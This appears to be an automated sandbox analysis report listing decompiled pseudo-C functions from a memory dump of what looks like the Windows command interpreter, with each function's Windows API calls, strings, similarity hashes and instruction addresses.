				intOrPtr _t43;
				intOrPtr _t44;
				void* _t48;
				intOrPtr _t49;
				void* _t50;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t56;
				void* _t58;

				_t52 =  *0x4a7541c4; // 0x0
				if(_t52 != 0) {
					_t18 = E4A7319D6(E4A732B0D(_a4, 0));
					_t55 = _t18;
					_v12 = _t55;
					if(_t55 != 0) {
						_t19 = E4A732148(_t55, 0x20);
						if(_t19 != 0) {
							 *_t19 = 0;
						}
						_t20 = _t55;
						_t3 = _t20 + 2; // 0x2
						_t48 = _t3;
						do {
							_t43 =  *_t20;
							_t20 = _t20 + 2;
						} while (_t43 != 0);
						_t40 = _t20 - _t48 >> 1;
						_t24 = _t52;
						_v8 = 1;
						_t5 = _t24 + 2; // 0x2
						_t44 = _t5;
						do {
							_t49 =  *_t24;
							_t24 = _t24 + 2;
						} while (_t49 != 0);
						_t26 = _t24 - _t44;
						_t27 = _t26 >> 1;
						_t56 = _t27;
						if(_t26 == 0) {
							L19:
							E4A736D44(_t44, 0x400023a9, 1, _a4);
							L20:
							E4A73142E(_v12);
							_t30 = _v8;
							L21:
							L22:
							return _t30;
						}
						while( *0x4a7541b4 == 0) {
							if(_t56 >= _t40) {
								__imp___wcsnicmp(_t52, _v12, _t40);
								_t58 = _t58 + 0xc;
								if(_t27 == 0) {
									E4A7358F3(L"%s\r\n", _t52);
									_v8 = _v8 & 0x00000000;
								}
							}
							_t52 = _t52 + 2 + _t56 * 2;
							_t31 = _t52;
							_t50 = _t31 + 2;
							do {
								_t44 =  *_t31;
								_t31 = _t31 + 2;
							} while (_t44 != 0);
							_t33 = _t31 - _t50;
							_t27 = _t33 >> 1;
							_t56 = _t27;
							if(_t33 != 0) {
								continue;
							}
							break;
						}
						if(_v8 == 0) {
							goto L20;
						}
						goto L19;
					}
					_t30 = _t18 + 1;
					goto L21;
				}
				_push("Null environment");
				fprintf(__imp___iob + 0x40, "\nCMD Internal Error %s\n");
				_t30 = 1;
				goto L22;
			}

0x4a74c9da
0x4a74c9e2
0x4a74ca14
0x4a74ca19
0x4a74ca1b
0x4a74ca20
0x4a74ca2b
0x4a74ca32
0x4a74ca36
0x4a74ca36
0x4a74ca39
0x4a74ca3b
0x4a74ca3b
0x4a74ca3e
0x4a74ca3e
0x4a74ca42
0x4a74ca43
0x4a74ca4d
0x4a74ca4f
0x4a74ca51
0x4a74ca58
0x4a74ca58
0x4a74ca5b
0x4a74ca5b
0x4a74ca5f
0x4a74ca60
0x4a74ca65
0x4a74ca67
0x4a74ca69
0x4a74ca6b
0x4a74cabe
0x4a74cac8
0x4a74cad0
0x4a74cad3
0x4a74cad8
0x4a74cadc
0x4a74cadd
0x4a74cadf
0x4a74cadf
0x4a74ca6d
0x4a74ca78
0x4a74ca7f
0x4a74ca85
0x4a74ca8a
0x4a74ca92
0x4a74ca97
0x4a74ca9c
0x4a74ca8a
0x4a74ca9d
0x4a74caa1
0x4a74caa3
0x4a74caa6
0x4a74caa6
0x4a74caaa
0x4a74caab
0x4a74cab0
0x4a74cab2
0x4a74cab4
0x4a74cab6
0x00000000
0x00000000
0x00000000
0x4a74cab6
0x4a74cabc
0x00000000
0x00000000
0x00000000
0x4a74cabc
0x4a74ca22
0x00000000
0x4a74ca22
0x4a74c9e9
0x4a74c9f7
0x4a74ca02
0x00000000

APIs

fprintf.MSVCRT ref: 4A74C9F7

Strings

Null environment, xrefs: 4A74C9E9
%s, xrefs: 4A74CA8D
CMD Internal Error %s, xrefs: 4A74C9F1

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: fprintf
String ID: CMD Internal Error %s$%s$Null environment
API String ID: 383729395-2781220306
Opcode ID: 8b672709d092e9c7dd45c6f611d31645b9df8130680185a06fbacc0213b6d7fc
Instruction ID: f3581ab500710ba31e7718f01a6e0e5630b68577a616b249ea769240676da94f
Opcode Fuzzy Hash: 8b672709d092e9c7dd45c6f611d31645b9df8130680185a06fbacc0213b6d7fc
Instruction Fuzzy Hash: EB31F672A09302ABDB71DB54DC09B9B3FA9EB55381F064250EA42EB541EBB0DA48C790

Uniqueness

Uniqueness Score: -1.00%

Function 4A74D26F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98registryCOMMON

Download Yara Rule

APIs

RegDeleteKeyExW.KERNEL32 ref: 4A74D2EE
RegOpenKeyExW.KERNEL32 ref: 4A74D30D
RegDeleteValueW.KERNEL32 ref: 4A74D334
RegCloseKey.KERNEL32(?), ref: 4A74D34F

Strings

%s=%s, xrefs: 4A74D2B9

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Delete$CloseOpenValue
String ID: %s=%s
API String ID: 2185037004-1087296587
Opcode ID: ea3d77ad50fc4b8a47adffd0f47cc22560f52e03cbe62838cc82107761f55e84
Instruction ID: d488cdcc7d82546e91d505e07d74c54eaa1c079c8ef1fb8ffd9822d3664c3e57
Opcode Fuzzy Hash: ea3d77ad50fc4b8a47adffd0f47cc22560f52e03cbe62838cc82107761f55e84
Instruction Fuzzy Hash: 93317C75109225FBDF715FA0CC8DA8F3F69EB0A760F128011F9599A152D7718A58CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 4A751BCF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E4A751BCF(intOrPtr _a4) {
				signed int _v8;
				short _v528;
				short _v1048;
				long _v1052;
				void* __esi;
				signed int _t10;
				intOrPtr _t12;
				int _t14;
				void* _t15;
				signed int _t22;
				void* _t24;
				void* _t31;
				void* _t32;
				signed int _t34;

				_t10 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t10 ^ _t34;
				_t12 = _a4;
				__imp__GetVolumePathNameW(_t12,  &_v528, 0x104);
				if(_t12 != 0) {
					_t14 = GetDriveTypeW( &_v528);
					if(_t14 == 0 || _t14 == 4) {
						_t15 = 0;
					} else {
						if(GetVolumeInformationW( &_v528, 0, 0, 0,  &_v1052,  &_v1052,  &_v1048, 0x104) == 0) {
							goto L1;
						} else {
							_t22 =  &_v1048;
							__imp___wcsicmp(_t22, L"NTFS");
							asm("sbb eax, eax");
							_t15 =  ~_t22 + 1;
						}
					}
				} else {
					L1:
					_t15 = 1;
				}
				return E4A7313A9(_t15, _t24, _v8 ^ _t34, _t31, _t32, 0x104);
			}

0x4a751bda
0x4a751be1
0x4a751be4
0x4a751bf6
0x4a751bfe
0x4a751c0c
0x4a751c16
0x4a751c5c
0x4a751c1d
0x4a751c3f
0x00000000
0x4a751c41
0x4a751c41
0x4a751c4d
0x4a751c56
0x4a751c59
0x4a751c59
0x4a751c3f
0x4a751c00
0x4a751c00
0x4a751c02
0x4a751c02
0x4a751c6a

APIs

GetVolumePathNameW.KERNEL32 ref: 4A751BF6
GetDriveTypeW.KERNEL32(?), ref: 4A751C0C
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000104), ref: 4A751C37
_wcsicmp.MSVCRT ref: 4A751C4D

Strings

NTFS, xrefs: 4A751C47

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Volume$DriveInformationNamePathType_wcsicmp
String ID: NTFS
API String ID: 2534522608-1702600371
Opcode ID: ba124278f670c82c161ac22f0a258b0dbadf72d6a782fd50f17bd39965d0c90e
Instruction ID: c3a88aa4afb65aaef0f204c5ebaad302017663094af509faa6665e6011a34f97
Opcode Fuzzy Hash: ba124278f670c82c161ac22f0a258b0dbadf72d6a782fd50f17bd39965d0c90e
Instruction Fuzzy Hash: E8118AF36161186ADB64DBA0CC49DEA77BCDB06286F124575A506D2440EA30DA88CB74

Uniqueness

Uniqueness Score: -1.00%

Function 4A74224D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E4A74224D(void* __ecx, char _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				void* _t7;
				long _t8;
				signed int _t15;
				signed int _t16;
				void* _t18;

				_t1 =  &_a4; // 0x4a74223d
				_v16.bInheritHandle = 1;
				_v16.lpSecurityDescriptor = 0;
				_v16.nLength = 0xc;
				_t7 = CreateFileW(E4A732598(__ecx,  *_t1), 0x40000000, 0,  &_v16, 4, 0x8000080, 0);
				_t18 = _t7;
				if(_t18 == 0xffffffff) {
					_t8 = GetLastError();
					 *0x4a754128 = _t8;
					if(_t8 == 0x6e) {
						 *0x4a754128 = 2;
					}
					_t16 = _t15 | 0xffffffff;
				} else {
					__imp___open_osfhandle(_t18, 8);
					_t16 = _t7;
					if(_t16 == 0xffffffff) {
						CloseHandle(_t18);
					}
				}
				return _t16;
			}

0x4a742257
0x4a74225c
0x4a742263
0x4a742266
0x4a742285
0x4a74228b
0x4a742290
0x4a749cca
0x4a749cd0
0x4a749cd8
0x4a749cda
0x4a749cda
0x4a749ce4
0x4a742296
0x4a742299
0x4a74229f
0x4a7422a6
0x4a749ced
0x4a749ced
0x4a7422a6
0x4a7422b1

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000,0000000C,00000004,08000080,00000000), ref: 4A742285
_open_osfhandle.MSVCRT ref: 4A742299
GetLastError.KERNEL32(?,4A74223D,?), ref: 4A749CCA
CloseHandle.KERNEL32(00000000), ref: 4A749CED

Strings

="tJ, xrefs: 4A742257

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorFileHandleLast_open_osfhandle
String ID: ="tJ
API String ID: 2775973614-3314973074
Opcode ID: 520d55bb9dcb2db3c0170dbbbf679bf2b55625912b0854763443c1df965dc0f2
Instruction ID: ee2d6b210eec3040104332abda63d71d30b68d1a16156d712db30b9d20a7b2d1
Opcode Fuzzy Hash: 520d55bb9dcb2db3c0170dbbbf679bf2b55625912b0854763443c1df965dc0f2
Instruction Fuzzy Hash: 920188B394A110AAD7305B65C80EB8E3FBDEB86376F124315E525D75C1DB704909C798

Uniqueness

Uniqueness Score: -1.00%

Function 4A737B0D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E4A737B0D(void* __ecx, void* _a4) {
				int _v8;
				int _v12;
				long _t9;
				char* _t15;

				_t15 = _a4;
				 *_t15 =  *_t15 & 0x00000000;
				_t9 = RegOpenKeyExW(0x80000001, L"Software\\Policies\\Microsoft\\Windows\\System", 0, 0x20019,  &_a4);
				if(_t9 == 0) {
					_v8 = 4;
					RegQueryValueExW(_a4, L"DisableCMD", 0,  &_v12, _t15,  &_v8);
					_t9 = RegCloseKey(_a4);
				}
				return _t9;
			}

0x4a737b15
0x4a737b18
0x4a737b30
0x4a737b38
0x4a737b4d
0x4a737b54
0x4a737b5d
0x4a737b5d
0x4a737b65

APIs

RegOpenKeyExW.KERNEL32 ref: 4A737B30
RegQueryValueExW.KERNEL32(?,DisableCMD,00000000,?,?,?), ref: 4A737B54
RegCloseKey.KERNEL32(?), ref: 4A737B5D

Strings

Software\Policies\Microsoft\Windows\System, xrefs: 4A737B26
DisableCMD, xrefs: 4A737B45

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
API String ID: 3677997916-1920437939
Opcode ID: f74bff94fb5fb6803e6de94c28a107c2880a574bbd81cc4ec602ee01015233d6
Instruction ID: 4ab7d2ce4f211352b8243210974a0b097311314ea92f2504220294380ec95f67
Opcode Fuzzy Hash: f74bff94fb5fb6803e6de94c28a107c2880a574bbd81cc4ec602ee01015233d6
Instruction Fuzzy Hash: C7F0FEF6501208BFEB208F80CC46FEA7FBCEB45795F114055FA05E6541E7B0AA44DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 4A731690, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25
libraryloaderthreadCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E4A731690() {
				struct HINSTANCE__* _t1;

				if( *0x4a7540d4 == 0) {
					_t1 =  *0x4a754094; // 0xffffffff
					if(_t1 != 0xffffffff) {
						L5:
						if(_t1 != 0) {
							 *0x4a7540d4 = GetProcAddress(_t1, "SetThreadUILanguage");
						}
						L7:
						if( *0x4a7540d4 != 0) {
							goto L1;
						}
						return SetThreadLocale(0x409);
					}
					_t1 = GetModuleHandleW(L"KERNEL32.DLL");
					 *0x4a754094 = _t1;
					if(_t1 == 0xffffffff) {
						goto L7;
					}
					goto L5;
				}
				L1:
				return  *0x4a7540d4(0);
			}

0x4a731697
0x4a73846a
0x4a738472
0x4a738489
0x4a73848b
0x4a738499
0x4a738499
0x4a73849e
0x4a7384a5
0x00000000
0x00000000
0x00000000
0x4a74418c
0x4a738479
0x4a73847f
0x4a738487
0x00000000
0x00000000
0x00000000
0x4a738487
0x4a73169d
0x00000000

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,4A737336,00000000), ref: 4A738479
GetProcAddress.KERNEL32(FFFFFFFF,SetThreadUILanguage,4A737336,00000000), ref: 4A738493
SetThreadLocale.KERNEL32(00000409,4A737336,00000000), ref: 4A74418C

Strings

SetThreadUILanguage, xrefs: 4A73848D
KERNEL32.DLL, xrefs: 4A738474

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressHandleLocaleModuleProcThread
String ID: KERNEL32.DLL$SetThreadUILanguage
API String ID: 886074793-2530943252
Opcode ID: e5a34d390274666e8ee6ff4ee8d54e0612c51cae7e3b0c5b972133eaac7541f0
Instruction ID: 62105911e7d974335acfb971e0e6f5ce9e6610a8bffe1d92bbc53d76c1aa3b65
Opcode Fuzzy Hash: e5a34d390274666e8ee6ff4ee8d54e0612c51cae7e3b0c5b972133eaac7541f0
Instruction Fuzzy Hash: A2F0FEF054AA10EBEAF09F70890AB143FB96702366F234650E719D6DC2D7748858D714

Uniqueness

Uniqueness Score: -1.00%

Function 4A74DF2B, Relevance: 7.9, APIs: 5, Instructions: 358
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E4A74DF2B(signed int __edx, intOrPtr _a4) {
				signed int _v8;
				short _v12;
				short _v14;
				char _v16;
				short _v536;
				short _v1056;
				short _v1574;
				char _v1576;
				char _v1580;
				signed int* _v1584;
				signed int _v1588;
				signed int* _v1592;
				signed int _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t108;
				intOrPtr _t110;
				intOrPtr* _t119;
				signed int _t122;
				signed int _t123;
				void* _t124;
				signed int* _t125;
				signed int _t126;
				short _t127;
				short _t128;
				short _t129;
				short _t130;
				intOrPtr* _t132;
				void* _t137;
				intOrPtr _t138;
				signed int _t140;
				signed int _t146;
				signed char* _t148;
				intOrPtr* _t156;
				signed int _t159;
				signed int _t169;
				signed int _t170;
				long _t174;
				signed int _t178;
				signed int* _t180;
				signed int _t181;
				signed int _t182;
				intOrPtr* _t188;
				intOrPtr _t192;
				signed int _t194;
				long _t198;
				signed int* _t203;
				signed int* _t204;
				void* _t208;
				signed int* _t210;
				signed int* _t217;
				signed int _t220;
				signed int _t221;
				void* _t225;
				intOrPtr* _t227;
				signed int _t229;
				intOrPtr* _t231;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				void* _t241;
				signed int* _t242;
				signed int* _t244;
				signed int _t247;
				signed int _t253;

				_t240 = __edx;
				_t108 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t108 ^ _t253;
				_t110 = _a4;
				_t245 = 0;
				_push(0);
				_v1604 = _t110;
				L4A731BC7();
				_t219 = 0x4a754ac0;
				if(_t110 == 0) {
					_t244 = E4A7322CA( *((intOrPtr*)(_v1604 + 0x3c)), 0, 0);
					_v1584 = _t244;
					_t217 = E4A73413B(_t244);
					_v1592 = _t217;
					__eflags =  *_t244;
					if( *_t244 == 0) {
						L30:
						_push(0x232a);
						L11:
						L4A74DF02(_t219, _t240);
						L12:
						E4A73185A( &_v536, 0x104, 0x4a755260);
						E4A73185A( &_v1056, 0x104, 0x4a755260);
						_t119 =  &_v536;
						_t240 = _t119 + 2;
						do {
							_t220 =  *_t119;
							_t119 = _t119 + 2;
							__eflags = _t220;
						} while (_t220 != 0);
						_t219 = _t217[6];
						_t122 = _t119 - _t240 >> 1;
						__eflags =  *_t219 & 0x00000010;
						_v1588 = _t122;
						if(( *_t219 & 0x00000010) != 0) {
							_t123 = _t122 - 1;
							_v1588 = _t123;
							_t124 = _t123 + _t123;
							_t219 = 0;
							__eflags = 0;
							 *((short*)(_t253 + _t124 - 0x214)) = 0;
							 *((short*)(_t253 + _t124 - 0x41c)) = 0;
						} else {
							E4A7320A9(0x4a755260,  &_v536, 0x104, _t217[4]);
						}
						__eflags = _t217[7] & 0x00000008;
						if((_t217[7] & 0x00000008) != 0) {
							L20:
							_t125 = _v1592;
							__eflags =  *((short*)(_t125 + 2)) - 0x3a;
							if( *((short*)(_t125 + 2)) == 0x3a) {
								goto L30;
							}
							_t219 =  *0x4a770664 & 0x0000ffff;
							_t126 = E4A7318EB(_t125,  *0x4a770664 & 0x0000ffff);
							__eflags = _t126;
							if(_t126 != 0) {
								goto L30;
							}
							_t127 =  *0x4a755260; // 0x0
							_v1576 = _t127;
							_t128 = 0x3a;
							_v1574 = _t128;
							_t129 = 0x2a;
							_v16 = _t129;
							_t130 = 0x3f;
							_v14 = _t130;
							__eflags = 0;
							_v12 = 0;
							_t132 = _v1584;
							_t240 = _t132 + 2;
							do {
								_t221 =  *_t132;
								_t132 = _t132 + 2;
								__eflags = _t221;
							} while (_t221 != 0);
							_t247 = _t132 - _t240 >> 1;
							_t137 = E4A731996(_v1584,  &_v16);
							__eflags = _t137 - _t247;
							_t138 = 0x20;
							_v1600 = _t138;
							asm("sbb esi, esi");
							_t245 =  ~_t247;
							_t140 = E4A733117( &_v536, _t138, _t217[6],  &_v1580);
							__eflags = _t140;
							if(_t140 != 0) {
								L31:
								_t219 = 0;
								_t52 =  &_v1596;
								 *_t52 = _v1596 & 0;
								__eflags =  *_t52;
								 *(_t253 + _v1588 * 2 - 0x214) = 0;
								while(1) {
									__eflags =  *0x4a7541b4;
									if( *0x4a7541b4 != 0) {
										break;
									}
									_t148 = _t217[6];
									__eflags =  *_t148 & 0x00000010;
									if(( *_t148 & 0x00000010) == 0) {
										_t245 = _t253 + _v1588 * 2 - 0x214;
										 *(_t253 + _v1588 * 2 - 0x214) = 0;
										__eflags = _t217[6] + 0x2c;
										E4A7320A9(_t253 + _v1588 * 2 - 0x214,  &_v536, 0x104, _t217[6] + 0x2c);
										E4A741D9B(_t219,  &_v1576, 0x104, _v1592, _t253 + _v1588 * 2 - 0x214);
										_t156 =  &_v1576;
										_t225 = _t156 + 2;
										do {
											_t240 =  *_t156;
											_t156 = _t156 + 2;
											__eflags = _t240;
										} while (_t240 != 0);
										_t219 = _v1588;
										_t159 = _t156 - _t225 >> 1;
										__eflags = _t219 + _t159 + 1 - 0x104;
										if(_t219 + _t159 + 1 > 0x104) {
											L55:
											E4A732F5C(_v1580);
											E4A73963C();
											_push(0x232e);
											goto L11;
										}
										__eflags = 0;
										 *((short*)(_t253 + _t219 * 2 - 0x41c)) = 0;
										E4A7320A9(_t245,  &_v1056, 0x104,  &_v1576);
										L47:
										_t169 = MoveFileW( &_v536,  &_v1056);
										__eflags = _t169;
										if(_t169 == 0) {
											_t174 = GetLastError();
											__eflags = _t174 - 0xb7;
											if(_t174 == 0xb7) {
												_t174 = 0x234d;
											}
											_push(0);
											_v1596 = _t174;
											E4A736D44(_t219);
											_t219 = _t174;
										}
										_t170 = E4A7395F8(_t217[6], _v1600, _v1580);
										__eflags = _t170;
										if(_t170 != 0) {
											continue;
										} else {
											E4A732F5C(_v1580);
											E4A73963C();
											__eflags = _v1596;
											_t104 = _v1596 != 0;
											__eflags = _t104;
											_t146 = 0 | _t104;
											L53:
											return E4A7313A9(_t146, _t217, _v8 ^ _t253, _t240, 0x104, _t245);
										}
									}
									_t178 = E4A732148( &_v1056,  *0x4a770664 & 0x0000ffff);
									__eflags = _t178;
									if(_t178 == 0) {
										goto L55;
									}
									_t180 = _t178 + 2;
									__eflags = 0;
									 *_t180 = 0;
									_t227 = _v1592;
									_v1584 = _t180;
									_t241 = _t227 + 2;
									do {
										_t181 =  *_t227;
										_t227 = _t227 + 2;
										__eflags = _t181;
									} while (_t181 != 0);
									_t229 = _t227 - _t241;
									__eflags = _t229;
									_t182 = _t229 >> 1;
									_t231 =  &_v1056;
									_t245 = _t231 + 2;
									do {
										_t240 =  *_t231;
										_t231 = _t231 + 2;
										__eflags = _t240;
									} while (_t240 != 0);
									_t219 = _t231 - _t245 >> 1;
									__eflags = _t219 + _t182 + 1 - 0x104;
									if(_t219 + _t182 + 1 > 0x104) {
										goto L55;
									}
									__eflags = 0x104 - (_v1584 -  &_v1056 >> 1);
									E4A73185A(_v1584, 0x104 - (_v1584 -  &_v1056 >> 1), _v1592);
									_t188 =  &_v1056;
									_t240 = _t188 + 2;
									do {
										_t237 =  *_t188;
										_t188 = _t188 + 2;
										__eflags = _t237;
									} while (_t237 != 0);
									_t219 = 0;
									 *((short*)(_t253 + (_t188 - _t240 >> 1) * 2 - 0x41c)) = 0;
									goto L47;
								}
								E4A732F5C(_v1580);
								E4A73963C();
								goto L1;
							}
							_t192 = 0x10;
							_t219 =  &_v1580;
							_v1600 = _t192;
							_t194 = E4A733117( &_v536, _t192, _t217[6],  &_v1580);
							__eflags = _t194;
							if(_t194 != 0) {
								__eflags = _t245;
								if(_t245 == 0) {
									goto L31;
								}
								E4A732F5C(_v1580);
								goto L30;
							}
							__eflags =  *0x4a754128 - 0x12;
							if( *0x4a754128 == 0x12) {
								 *0x4a754128 = 2;
							}
							L10:
							_push( *0x4a754128);
						} else {
							_t198 = GetFileAttributesW(E4A732598(_t219,  &_v536));
							_t219 = _t217[6];
							 *(_t217[6]) = _t198;
							__eflags =  *(_t217[6]) - 0xffffffff;
							if( *(_t217[6]) != 0xffffffff) {
								goto L20;
							}
							_push(GetLastError());
						}
						goto L11;
					}
					__eflags =  *_t217;
					if( *_t217 == 0) {
						goto L30;
					}
					_t203 = E4A73413B(_t217);
					__eflags =  *_t203;
					if( *_t203 != 0) {
						goto L30;
					}
					_t204 = _t244;
					_t8 =  &(_t204[0]); // 0x2
					_t242 = _t8;
					do {
						_t239 =  *_t204;
						_t204 =  &(_t204[0]);
						__eflags = _t239;
					} while (_t239 != 0);
					_t208 = E4A732598(_t239, _t244);
					__eflags = (_t204 - _t242 >> 1) + 1;
					E4A73185A(_t244, (_t204 - _t242 >> 1) + 1, _t208);
					_t210 = _t217;
					_t9 =  &(_t210[0]); // 0x2
					_t219 = _t9;
					do {
						_t240 =  *_t210;
						_t210 =  &(_t210[0]);
						__eflags = _t240;
					} while (_t240 != 0);
					E4A73185A(_t217, (_t210 - _t219 >> 1) + 1, E4A732598(_t219, _t217));
					_t217 = E4A739662(_t219, _t240, __eflags, _t244);
					__eflags = _t217 - 1;
					if(_t217 != 1) {
						goto L12;
					}
					goto L10;
				}
				L1:
				_t146 = 1;
				goto L53;
			}

0x4a74df2b
0x4a74df36
0x4a74df3d
0x4a74df40
0x4a74df46
0x4a74df48
0x4a74df4e
0x4a74df54
0x4a74df5a
0x4a74df5d
0x4a74df77
0x4a74df7a
0x4a74df85
0x4a74df87
0x4a74df8d
0x4a74df90
0x4a74e1ab
0x4a74e1ab
0x4a74e009
0x4a74e009
0x4a74e00e
0x4a74e021
0x4a74e02f
0x4a74e034
0x4a74e03a
0x4a74e03d
0x4a74e03d
0x4a74e041
0x4a74e042
0x4a74e042
0x4a74e047
0x4a74e04c
0x4a74e04e
0x4a74e051
0x4a74e057
0x4a74e06b
0x4a74e06c
0x4a74e072
0x4a74e074
0x4a74e074
0x4a74e076
0x4a74e07e
0x4a74e059
0x4a74e064
0x4a74e064
0x4a74e086
0x4a74e08a
0x4a74e0b8
0x4a74e0b8
0x4a74e0be
0x4a74e0c3
0x00000000
0x00000000
0x4a74e0c9
0x4a74e0d2
0x4a74e0d7
0x4a74e0d9
0x00000000
0x00000000
0x4a74e0df
0x4a74e0e7
0x4a74e0ee
0x4a74e0ef
0x4a74e0f8
0x4a74e0f9
0x4a74e0ff
0x4a74e100
0x4a74e104
0x4a74e106
0x4a74e10a
0x4a74e110
0x4a74e113
0x4a74e113
0x4a74e117
0x4a74e118
0x4a74e118
0x4a74e121
0x4a74e12d
0x4a74e134
0x4a74e136
0x4a74e141
0x4a74e14e
0x4a74e151
0x4a74e153
0x4a74e158
0x4a74e15a
0x4a74e1b5
0x4a74e1bb
0x4a74e1bd
0x4a74e1bd
0x4a74e1bd
0x4a74e1ca
0x4a74e1cd
0x4a74e1cd
0x4a74e1d4
0x00000000
0x00000000
0x4a74e1da
0x4a74e1dd
0x4a74e1e0
0x4a74e29f
0x4a74e2a6
0x4a74e2ac
0x4a74e2b8
0x4a74e2cc
0x4a74e2d1
0x4a74e2d7
0x4a74e2da
0x4a74e2da
0x4a74e2de
0x4a74e2df
0x4a74e2df
0x4a74e2e6
0x4a74e2ec
0x4a74e2f2
0x4a74e2f4
0x4a74e3af
0x4a74e3b5
0x4a74e3ba
0x4a74e3bf
0x00000000
0x4a74e3bf
0x4a74e2fa
0x4a74e2fc
0x4a74e313
0x4a74e318
0x4a74e326
0x4a74e32c
0x4a74e32e
0x4a74e330
0x4a74e336
0x4a74e33b
0x4a74e33d
0x4a74e33d
0x4a74e342
0x4a74e345
0x4a74e34b
0x4a74e351
0x4a74e351
0x4a74e361
0x4a74e366
0x4a74e368
0x00000000
0x4a74e36e
0x4a74e374
0x4a74e379
0x4a74e380
0x4a74e386
0x4a74e386
0x4a74e386
0x4a74e389
0x4a74e397
0x4a74e397
0x4a74e368
0x4a74e1f5
0x4a74e1fa
0x4a74e1fc
0x00000000
0x00000000
0x4a74e203
0x4a74e204
0x4a74e206
0x4a74e209
0x4a74e20f
0x4a74e215
0x4a74e218
0x4a74e218
0x4a74e21c
0x4a74e21d
0x4a74e21d
0x4a74e222
0x4a74e222
0x4a74e226
0x4a74e228
0x4a74e22e
0x4a74e231
0x4a74e231
0x4a74e235
0x4a74e236
0x4a74e236
0x4a74e23d
0x4a74e243
0x4a74e245
0x00000000
0x00000000
0x4a74e263
0x4a74e26c
0x4a74e271
0x4a74e277
0x4a74e27a
0x4a74e27a
0x4a74e27e
0x4a74e27f
0x4a74e27f
0x4a74e288
0x4a74e28a
0x00000000
0x4a74e28a
0x4a74e3a0
0x4a74e3a5
0x00000000
0x4a74e3a5
0x4a74e15e
0x4a74e15f
0x4a74e169
0x4a74e177
0x4a74e17c
0x4a74e17e
0x4a74e19c
0x4a74e19e
0x00000000
0x00000000
0x4a74e1a6
0x00000000
0x4a74e1a6
0x4a74e180
0x4a74e187
0x4a74e18d
0x4a74e18d
0x4a74e003
0x4a74e003
0x4a74e08c
0x4a74e099
0x4a74e09f
0x4a74e0a2
0x4a74e0a7
0x4a74e0aa
0x00000000
0x00000000
0x4a74e0b2
0x4a74e0b2
0x00000000
0x4a74e08a
0x4a74df96
0x4a74df99
0x00000000
0x00000000
0x4a74dfa0
0x4a74dfa5
0x4a74dfa8
0x00000000
0x00000000
0x4a74dfae
0x4a74dfb0
0x4a74dfb0
0x4a74dfb3
0x4a74dfb3
0x4a74dfb7
0x4a74dfb8
0x4a74dfb8
0x4a74dfc4
0x4a74dfca
0x4a74dfcd
0x4a74dfd2
0x4a74dfd4
0x4a74dfd4
0x4a74dfd7
0x4a74dfd7
0x4a74dfdb
0x4a74dfdc
0x4a74dfdc
0x4a74dff1
0x4a74dffc
0x4a74dffe
0x4a74e001
0x00000000
0x00000000
0x00000000
0x4a74e001
0x4a74df5f
0x4a74df61
0x00000000

APIs

_setjmp3.MSVCRT ref: 4A74DF54
GetFileAttributesW.KERNEL32(00000000,?,?,00000104,?,?,00000104,4A755260,?,00000104,4A755260,00000010,?,?,?,00000020), ref: 4A74E099

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: AttributesFile_setjmp3
String ID:
API String ID: 4095645427-0
Opcode ID: 42b508e09fe19597365abdd882e3dae19c4a4bd096b23d0fa3060b881fb96443
Instruction ID: 4903949e3e1c1169a5a9d75ac4ec0a4dabf9ac7f37dddff57b81a9c6dd9f112d
Opcode Fuzzy Hash: 42b508e09fe19597365abdd882e3dae19c4a4bd096b23d0fa3060b881fb96443
Instruction Fuzzy Hash: 47C1447290551ADADF309F64CD88EEA7BB9EF44320F0140E5E949DB152EB319A89CF90

Uniqueness

Uniqueness Score: -1.00%

Function 4A73DEBE, Relevance: 7.8, APIs: 5, Instructions: 256
COMMON

Download Yara Rule

C-Code - Quality: 98%

